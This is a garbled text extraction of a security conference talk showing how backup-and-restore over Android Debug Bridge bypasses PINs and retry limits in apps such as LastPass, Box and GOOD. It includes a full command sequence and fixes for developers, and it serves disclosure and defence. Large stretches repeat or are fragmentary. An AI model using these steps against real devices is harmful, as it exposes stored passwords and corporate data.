mobile fail: cracking open "secure" android containers [sectorca]

Chris John Riley

MOBILE FAILCracking open bdquosecureldquo Android Containers

Chris John Riley | 22102014 | 3

gt whoami

IT Security Consultant

Regular conference speaker DEF CON | Bsides | Hashdays | SecZone | DeepSec

blog httpblogc22cc twitter ChrisJohnRiley Abject Failure (See Life for reference)

ldquoTHE WISEST MAN IS HE WHO

KNOWS THAT HE KNOWS NOTHINGrdquo

SOCRATES APOLOGY 21D


[0] Why

[1] Scenario

[2] How

[3] Closer Look

[4] Making it easy

[5] Review


0

][WHY


too much information

01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100


ldquoSecurerdquo Containers

Multiple usesPa$$w0rd databasesCorporate mail containersSecure notes filesSecure Messaging


secondary authentıcatıon


buthellip


The devıce

ıs ınsecure


worse still


BYOD

Bring Your Own Disease


Solution


Move the security closer

to the data



buthellip


hellip I lost my phone


314 mobile phones stolen in London every day

offenders traced three or four times out of 10

Source UK Metropolitan Police 012013


state of

securityDevice

Source threatpost



Android PIN Brute-Force

bull Teensy devicebull Programmable USB HIDbull ~166 hours (4 digit PIN)

httpsforumshak5orgindexphptopic28165-payload-android-brute-force-4-digit-pin

KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario

bull Given physical access to a devicebull What security do ldquosecurerdquo containers provide

bull temporary access (lt 3 minutes)bull permanent access


buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT


bypass devıce PIN12

34


r00t the device


do anythıng resemblınghellip




HOW O

2

][


keep it simple


Androıd Debug Brıdge


ADB ndash Android Debug Bridge

bull Requires USB Debugging Enabledbull Doesnt require ROOTed device

bull Root grants further access makes things trivial

httpdeveloperandroidcomtoolshelpadbhtml



adbcrash course



Allows application side-loadingbull [un]install applications over adb

bull Doesnrsquot require device to be activebull Can be PIN locked (for some functions)bull New security implemented in 43




adb backupbull Backup Android device over adb (ICS onwards)

bull -system rarr system databull -apk rarr application apk

bull Can backup specific application data individually

adb backup comandroidapp -f backupab



adb restorebull Restore Android backup over adb (ICS onwards)

bull Restore specific application data individuallybull with or without application (apk)

adb restore backupab




adb pull sdcardsecrettxt secrettxt


adb pull pushbull Copy data to from device over adbbull Limited access for non-root users

bull no access to application config without rootbull Works on locked devices (PIN Protected)




adb shellbull Shell access on device

bull Send keys tapsbull Limited for non-root usersbull Works on locked devices (PIN Protected)

adb shell



Supporting Tools

bull opensslbull w zlib support compiled

bull starbull tar tool w added functionality we need


3

][Closerlook



lastpass


lastpass

Personal solution (w enterprise option)bull Uses online syncbull Can be secured with a PINbull Can wipe data after 5 false logonsbull Restricts screenshots

httpslastpasscomandroid


lastpass

Can store lastpasscom passwordbull So users dont need to type it EVERY timebull Reduces securitybull Makes it usable


Why store

the PW


_mySecur3LsTp$$p$$w0rd1sDAb0mbampampamp

bull Easy to rememberbull Impossible to type


Itrsquos

thoughOK


You can enable a

PIN


PIN Securitybull Limited to 4 digitsbull ldquoauto-Wiperdquo data

bull after 5 false logons


PIN ==

SECURE


AndroidManifestxml


ltapplication androidallowBackup=ldquotruerdquogt

AndroidManifestxml


Default true


adb backup comlastpasslpandroid ndashf lpab


What good is an ab file


bull zlib compressed (kinda)bull skip header (24 bytes)bull pipe to openssl wzlib support

dd if=dropboxab bs=24 skip=1 |

openssl zlib -d gt dropboxtar

Android Backup (ab)


LPandroidxml

bull lastpasscom usernamebull laspasscom password (encoded)bull PIN (encoded)bull Settingsbull



ltstring name=reprompt_triesgt

0ltstringgt


That looks interesting


( )THEORY


if reprompt_tries lt 5

prompt_for_pin()else

drop_the_DBass()end


Theory

bull reprompt_tries as iterator bull increases till it reaches 5bull Sounds reasonable

bull edit the XML and restore itbull Lets set ldquoreprompt_triesrdquo to -9999 then )


Proposed Attack

bull Backup app databull Edit XML

bull set ldquoreprompt_triesrdquo to -9999

bull Repackagebull Restore


0 - adb backup comlastpasslpandroid -f lpassab

1 - dd if=lpassab bs=24 skip=1 | openssl zlib -d gt lpasstar

2 - tar -tf lpasstar gt lpasslist

3 - tar -xvf lpasstar

4 - edit appscomlastpasslpandroidspLPandroidxml

5 - star -c -v -f lpass_newtar -no-dirslash list=lpasslist apps

6 - dd if=lpassab bs=24 count=1 of=lpass_newab

7 - openssl zlib -in lpass_newtar gtgt lpass_newab

8 - adb restore lpass_newab


Not the easiest process


counter++



We get

tries10000



We get

tries10000



Letrsquos make it easier


ltstring name=passwordrepromptonactivategt0ltstringgt

ltstring name=pincodeforrepromptgthellipltstringgt ltstring name=requirepingt0ltstringgt


PROFIT


Easier Attack


bull remove PIN

bull Repackagebull Restorebull WIN

easierhellip



>


for points


Persıstencepəˈsɪst(ə)ns

noun1 the fact of continuing in an opinion or course of action in spite of difficulty or opposition


Persistence

bull Backup LastPass from device Abull Edit backup to remove PINbull Rebuild backup

bull Restore backup to device Bbull Close amp restart to re-sync changesbull Ongoing Profit


but I RESET my password


PROFIT++



spideroak


Personal and business solutionsbull BIG on privacybull Not bad on security

spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak


sh ts itself in the foot

8


adb backupbull rapp_databaselocalstoragefile__0localstorage

bull BasicCredentials Basic xxxxx

spideroak



Still better than moist



boxcom


Boxcom

Personal solutionbull Can be secured w a PINbull Limited to 4 digits


httpswwwboxcomabout-ussecurity


REPHRASE

POLICYYOUR

AGRESSIVE MUCH



Just get to the good bıt

alreadyhellip


Boxcom

adb backupbull myPreferencexml


ltstring name=pinCodegt

xxxxxltstringgt

hashed pin

myPreferencexml


subtle [ˈsʌtəl]adj

a not immediately obvious or comprehensible

b cunning or wily


Boxcom

bull adb backupbull remove PINbull adb restore

bull Profit


>



GOODfor enterprise


GOOD

Enterprise email solutionbull email | contacts | intranet browser | hellipbull Secured with a PIN or password

bull enterprise policy

bull Wipes data device after 10 false logons

httpswwwgoodcom


Adv security features

bull Double encryptionbull SSL Tunnel + Encrypted contents

bull Full MDM solutionbull Password Policiesbull hellip

bull r00t detectionbull emulator detectionbull advanced detection

httpswwwgoodcom


Lost device (BYOD)bull Can an attacker prevent secure wipebull Can an attacker access cached data


PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2


hellipafter 10 false logonsauto-wipe


Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory

bull Auto-wipe counterbull Stored IN app data somewhere


THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack

bull Backup app databull until goodunlock

bull Try 9 PINSbull Restore app data


PROBLEM

3



Naiumlve Attack timing

1875 ppm ~ 50 keyspace

bull 4 digit PINbull est 45 hours

bull 6 digit PINbull est 185 days

bull 8 digit PINbull est 5 years



bull 4 lower alphanumbull est 31 days

bull 6 lower alphanumbull est 3 years





bull 4 mixed alphanumbull est 1 year

bull 6 mixed alphanumbull est 465 years




Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack

bull Automate PIN + restorebull adb shell input textbull adb shell input keyeventbull adb shell input tap


Minimize keyspace

bull Password Rulesbull No sequenced numbers (eg 12xx x23x xx32)bull No duplicate numbers (eg 1111)

bull Resultbull HIGHER security

bull Less stupiditybull REDUCED keyspace


herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology

bull Common methodologybull Backup (adb)bull Extractbull Examine bull Editbull Repackbull Restore (adb)

larr here be dragonslarr bypass all the things


remember this process












Say that 10 times fast


automatıon


Pythontothe rescue


ab_unpackerpy

httpsgithubcomChrisJohnRileyRandom_Code


ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug



You have an application bugbull Like one of the ones mentioned herebull Buthellip the vendor has patched it


exploit


Exploiting it anyway

Canrsquot exploit it straight offbull Need to make the vuln re-appear



Android allows downgrading of appsbull In a round-about way anyway )bull Bug or feature

bull Google says feature



METHOD

1


Reinstall flag

Reinstall app using ndashr parameterbull APK MUST have valid matching signature

adb install -r ltvulnerble_versionapkgt


METHOD

2


Uninstall Reinstall

bull Uninstall applicationbull Leave program data in place (-k)

bull Reinstall appbull APK MUST have valid matching signature

1gt adb uninstall -k ltcurrentappversiongt2gt adb install ltvulnerble_versionapkgt


exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW


ldquosecurerdquocontainers

=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup

httpdeveloperandroidcomguidetopicsdatabackuphtml


Some devs

GET it



pref fıles


Securing Apps

bull Preference files are NOT secretbull Encrypt preference databull ONLY store encrypted passwords

bull No XOR base64 pleasebull Better still donrsquot store passwords here

bull Donrsquot TRUST the configbull HMAC | Sign | Encrypt


androıd backup


Securing Apps

bull Disallow Android Backupbull if you donrsquot absolutely need it

ltapplication androidallowBackup=ldquofalserdquogt


extra securıty


Extra Security

bull USB Debuggingbull Detect + Disable app when activated

bull Root makes these hacks easier stillbull readedit preference files on device itselfbull ROOT detection is too basic

bull easy to fool

usersen

d


Users

bull Encrypt your devicebull Encrypts ADB backups

bull Need to enter same passcode on backup screen

bull Disable USB Debuggingbull protects against adb pull push attacks

bull Donrsquot lose your phone )


Users

bull Upgrade to the latest Android releasebull If possible

bull Additional ADB protectionsbull Introduced in Android 43

QuestionsOMFG

A Talking Horse

Bite me space boy

Thanks for cominghttpblogc22cc

ChrisJohnRiley contactc22cc

MOBILE FAIL Cracking open bdquosecureldquo Android Containers

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61

ADB ndash Android Debug Bridge (2)





Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml

AndroidManifestxml (2)

Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169


Naiumlve Attack timing (2)


Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210


Exploiting it anyway (2)

Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


gt whoami

IT Security Consultant

Regular conference speaker DEF CON | Bsides | Hashdays | SecZone | DeepSec

blog httpblogc22cc twitter ChrisJohnRiley Abject Failure (See Life for reference)





[0] Why

[1] Scenario

[2] How

[3] Closer Look

[4] Making it easy

[5] Review


0

][WHY



01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100







buthellip


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





[0] Why

[1] Scenario

[2] How

[3] Closer Look

[4] Making it easy

[5] Review


0

][WHY



01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100







buthellip


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


0

][WHY



01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100







buthellip


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



01100100 01100101 01110010 01110000

01100100 01100101 01110010 01110000 01111001

01100100 01100101 01110010 01110000 01101001 01100101 01110011 01110100







buthellip


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

